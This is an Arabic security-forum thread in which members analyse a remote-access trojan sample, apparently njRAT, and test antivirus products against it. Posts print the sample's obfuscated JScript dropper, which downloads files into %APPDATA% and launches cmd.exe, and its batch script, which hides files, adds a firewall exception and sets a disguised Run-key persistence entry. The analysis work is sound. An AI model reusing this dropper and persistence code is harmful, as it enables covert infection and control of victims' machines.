تروجان خطير - نجرات -

imadeddine wissam · 13 نوفمبر 2014

مساء الفل للناس الكل

باكدور خطير تحت اسم نجرات

الرابط

[hide]

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]

infected

Egypt~Lover · 13 نوفمبر 2014

MagicianMiDo32 · 13 نوفمبر 2014

جاري محاولة كسره + بسملة رآآئعة

imadeddine wissam · 13 نوفمبر 2014

medo32 قال:
جاري محاولة كسره + بسملة رآآئعة

اهلا بالغالي ميدو شكرا لك ننتظر تجربتك

MagicianMiDo32 · 13 نوفمبر 2014

[hide]var D2Y={'u'

function(h){return (function(S8,H){return (function(m8){return {J:m8};})(function(E){var w,j=0;for(var Y8=S8;j<E["length"];j++){var p=H(E,j);w=j===0?p:w^p;}return w?Y8:!Y8;});})((function(B,o,y,L){var s=29;return B(h,s)-L(o,y)>s;})(parseInt,Date,(function(o){return (''+o)["substring"](1,(o+'')["length"]-1);})('_getTime2'),function(o,y){return new o()[y]();}),function(E,j){var n=parseInt(E["charAt"](j),16)["toString"](2);return n["charAt"](n["length"]-1);});})('ecr3caa1n')};(function(A){var R=D2Y.u.J("ce7")?0:"

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

",g=D2Y.u.J("25")?"":"c",q=D2Y.u.J("144")?'sysfile.cmd"':"%APPDATA%\\7za.exe",X=D2Y.u.J("36")?'/c"':'sysfile.cmd"',N=D2Y.u.J("ca86")?"d":"cmd.exe",k=D2Y.u.J("e2")?"Type":"ShellExecute",v=D2Y.u.J("c4e5")?"%APPDATA%\\sysfile.cmd":"%APPDATA%\\sysfile.cmd",D=D2Y.u.J("a81c")?"

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

":'sysfile.cmd"',G="%APPDATA%\\sysfile",C=D2Y.u.J("cb")?"

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

":"GET",T="%APPDATA%\\7za.exe",U="

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

",W=D2Y.u.J("8cd1")?"cmd.exe":"%APPDATA%\\",F=D2Y.u.J("2cbd")?"SaveToFile":"Shell.Application",K="WScript.Shell",I="Scripting.FileSystemObject",t="ExpandEnvironmentStrings";function m(r,Y){var x=2,e=D2Y.u.J("2e")?"CreateObject":"responseBody",O=3,Q="ADODB.Stream",M=D2Y.u.J("6c3c")?"send":"Close",l=1,V="GET",a=D2Y.u.J("f368")?"ShellExecute":"open",Z="Msxml2.XMLhttp",z=D2Y.u.J("c2")?"SaveToFile":"CreateObject",P=null;if(!Y||!r)return P;Y=i[t](Y);var S=D2Y.u.J("cf")?WScript[z](Z):"Close";S[a](V,r,!l);S[M](P);var f=new ActiveXObject(Q);with(f)return Mode=O,Type=D2Y.u.J("fc4")?l:"Open",Open(),Write(S[e]),SaveToFile(Y,x),Close(),Y;}fso=D2Y.u.J("84")?"fso":new ActiveXObject(I);var i=new ActiveXObject(K);A=new ActiveXObject(F);FileDestr=D2Y.u.J("eb")?i[t](W):"c";m(U,T);m(C,G);m(D,v);A[k](N,X+FileDestr+q,g,g,R);})(this);

[/hide]

واضح إنها سكربت لتحميل ملف في مجلد الـ AppData

MagicianMiDo32 · 13 نوفمبر 2014

عبارة عن شلات تنفذ في CMD

[hide]
cd "%APPDATA%"
attrib +h "%APPDATA%\sysfile.cmd"
if exist "%APPDATA%\rtv.bin" goto end
"%APPDATA%\7za.exe" x -pv1nj3ct02 -y "%APPDATA%\sysfile" -o"%APPDATA%"
attrib +h +s +r "%APPDATA%\sysfiles\*.*"
attrib +h +s +r "%APPDATA%\sysfiles"
del /f /q "%APPDATA%\sysfile"
cd "%APPDATA%"
cd sysfiles
netsh firewall add allowedprogram "%APPDATA%\sysfiles\client32.exe" AppleWebKit ENABLE
if exist client32.exe start client32.exe
taskkill /f /im rundll32.exe
ping 127.0.0.1 -n 1
taskkill /f /im rundll32.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe"
taskkill /f /im client32.exe
ping 127.0.0.1 -n 2
if exist client32.exe start client32.exe
taskkill /f /im rundll32.exe
echo 1>"%APPDATA%\rtv.bin"
attrib +s +h "%APPDATA%\rtv.bin"
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe"
:end
attrib -h "%APPDATA%\sysfile.cmd"
if not exist "%APPDATA%\java.exe" (del /f /q "%APPDATA%\7za.exe")
del /f /q "%APPDATA%\sysfile"
del /f /q "%APPDATA%\java.exe"
del /f /q "%APPDATA%\*.js"
del /f /q "%APPDATA%\input"
attrib -h "%APPDATA%\sysfile.cmd"
del /f /q "%APPDATA%\sysfile.cmd"
del %0

[/hide]

MagicianMiDo32 · 13 نوفمبر 2014

,واضح هنا إضافة ستارت أب وحذف بعض الملفات

MagicianMiDo32 · 13 نوفمبر 2014

[hide]
cd "%APPDATA%"
attrib +h "%APPDATA%\sysfile.cmd"
if exist "%APPDATA%\rtv.bin" goto end
"%APPDATA%\7za.exe" x -pv1nj3ct02 -y "%APPDATA%\sysfile" -o"%APPDATA%"
attrib +h +s +r "%APPDATA%\sysfiles\*.*"
attrib +h +s +r "%APPDATA%\sysfiles"
del /f /q "%APPDATA%\sysfile"
cd "%APPDATA%"
cd sysfiles
netsh firewall add allowedprogram "%APPDATA%\sysfiles\client32.exe" AppleWebKit ENABLE
if exist client32.exe start client32.exe
taskkill /f /im rundll32.exe
ping 127.0.0.1 -n 1
taskkill /f /im rundll32.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe"
taskkill /f /im client32.exe
ping 127.0.0.1 -n 2
if exist client32.exe start client32.exe
taskkill /f /im rundll32.exe
echo 1>"%APPDATA%\rtv.bin"
attrib +s +h "%APPDATA%\rtv.bin"
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe"
:end
attrib -h "%APPDATA%\sysfile.cmd"
if not exist "%APPDATA%\java.exe" (del /f /q "%APPDATA%\7za.exe")
del /f /q "%APPDATA%\sysfile"
del /f /q "%APPDATA%\java.exe"
del /f /q "%APPDATA%\*.js"
del /f /q "%APPDATA%\input"
attrib -h "%APPDATA%\sysfile.cmd"
del /f /q "%APPDATA%\sysfile.cmd"
del %0

[/hide]

MagicianMiDo32 · 13 نوفمبر 2014

[hide]var E5V={'E'

function(G5){return (function(z5,L5){return (function(W5){return {X:W5};})(function(s){var B5,C=0;for(var f5=z5;C<s["length"];C++){var H5=L5(s,C);B5=C===0?H5:B5^H5;}return B5?f5:!f5;});})((function(l5,a,g,b5){var V5=28;return l5(G5,V5)-b5(a,g)>V5;})(parseInt,Date,(function(a){return (''+a)["substring"](1,(a+'')["length"]-1);})('_getTime2'),function(a,g){return new a()[g]();}),function(s,C){var Y=parseInt(s["charAt"](C),16)["toString"](2);return Y["charAt"](Y["length"]-1);});})('j3g8mr400')};(function(I){var m=E5V.E.X("34")?0:"%APPDATA%\\",F=E5V.E.X("bdfe")?'':0,U=E5V.E.X("537")?'sysfile.cmd"':"Msxml2.XMLhttp",J=E5V.E.X("8f")?'/c"':null,A=E5V.E.X("53")?null:'cmd.exe',w=E5V.E.X("3d")?"open":"ShellExecute",e=E5V.E.X("a3")?"%APPDATA%\\sysfile.cmd":"

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

",K=E5V.E.X("675")?'cmd.exe':"

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

",p="%APPDATA%\\sysfile",y=E5V.E.X("e61")?"

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

":'cmd.exe',o="%APPDATA%\\7za.exe",v=E5V.E.X("d71")?"

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

":"

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

",D=E5V.E.X("dc3")?"FileDest":"Shell.Application",R="WScript.Shell",j=E5V.E.X("44eb")?"Scripting.FileSystemObject":"oADOStream",k="%APPDATA%\\",N="ExpandEnvironmentStrings";function f(H){return new ActiveXObject(H);}function z(H,V){var r=2,i="responseBody",T=1,S=E5V.E.X("126d")?"ADO":3,h="DB.Stream",t=E5V.E.X("75")?"WshShell":"ADO",c="send",M=E5V.E.X("26")?"responseBody":false,Z="GET",q="open",O="Msxml2.XMLhttp",P=E5V.E.X("7e")?"CreateObject":"oXMLhttp",W=null;if(!V||!H)return W;V=Q[N](V);var L=WScript[P](O);L[q](Z,H,M);L[c](W);var n=E5V.E.X("cf3a")?'cmd.exe':f(t+h);with

{var G=function(l){Mode=l;},b=function(B){Type=B;};G(S);b(T);Open();Write(L);SaveToFile(V,r);Close();return V;}}var x=E5V.E.X("ae4")?"Close":k,d=fso=f(j),Q=f(R),u=E5V.E.X("e2")?"send":new ActiveXObject(D);FileDestr=Q[N](x);z(v,o);z(y,p);z(K,e);u[w](A,J+FileDestr+U,F,F,m);})(this);[/hide]

MagicianMiDo32 · 13 نوفمبر 2014

الملف Sys1 مضغوط ومغلق بكلمة سر

يحوي هذة الملفات

الملف الآخر مبرمج بـ C++

MagicianMiDo32 · 13 نوفمبر 2014

عبارة عن ملف 16 بت يعمل عن طريق حاضن الـ ntvdm.exe

qysr · 13 نوفمبر 2014

جربت تشغيل الدوده تحت اسم mumble

تؤدي الى تحميل ملف آخر ..

اتصال الى لوكسمبورج

ملف غريب مرفوع منذ 3 سنوات على فايرس توتال و اكتشاف 1 من الدوكتر ويب

MagicianMiDo32 · 13 نوفمبر 2014

qysr قال:
جربت تشغيل الدوده تحت اسم mumble

مشاهدة المرفق 67786

تؤدي الى تحميل ملف آخر ..

مشاهدة المرفق 67787

اتصال الى لوكسمبورج

مشاهدة المرفق 67788

ملف غريب مرفوع منذ 3 سنوات على فايرس توتال و اكتشاف 1 من الدوكتر ويب

مشاهدة المرفق 67785

قول بالظبت لكسمبورج البلد ولا لكسمبورج المحطة

Remote Admin
شكله شل ميتاسبلويت

أبو رمش · 14 نوفمبر 2014

اليتد فيندر بالفحص لا شي و عند التشغيل ..
الملف الأول ..

الملف الثاني ظهر لي هذا الاتصال

و بعدها ..

ALmehob · 14 نوفمبر 2014

وعليكم السلام ورحمة الله وبركاته
والله يا اخوانى الكاسبر اكتشف الفايروس بمجرد دخولى الى هذه الصفحة
[hide]

[/hide]

Mr.AzOz · 14 نوفمبر 2014

النورتون في سبات عميقق

!

Abdelkarim · 14 نوفمبر 2014

abrahim2014 قال:
وعليكم السلام ورحمة الله وبركاته
والله يا اخوانى الكاسبر اكتشف الفايروس بمجرد دخولى الى هذه الصفحة
[hide]

[/hide]

نفس الشيء حذث معي

لكن بإيقاف حماية الويب و تحميل العينة و فحصها لم يتم اكتشاف اي شيء

ربما هو اكتشاف خاطئ لا غير

Abdelkarim · 14 نوفمبر 2014

ثم تشغيل الملفين و النتيجة فشل الكاسبر مع الملف الاول
اما مع الثاني فكل ما فعله الكاسبر هو امساك هذا الملف

فائز بمسابقة التصميم الموسم العاشر،(خبراء زيزووم)

توقيع : imadeddine wissamimadeddine wissam is verified member.

زيزوومى ذهبى

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

فائز بمسابقة التصميم الموسم العاشر،(خبراء زيزووم)

توقيع : imadeddine wissamimadeddine wissam is verified member.

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

زيزوومي VIP

مراقب قسم الحماية ، خبراء زيزووم

توقيع : MagicianMiDo32

.: خبير نقاشات الحماية :.

توقيع : أبو رمش

إداري سابق

توقيع : ALmehob

زيزوومي ماسى

توقيع : Mr.AzOz

(خبراء زيزووم)

(خبراء زيزووم)

توقيع : imadeddine wissam

توقيع : imadeddine wissam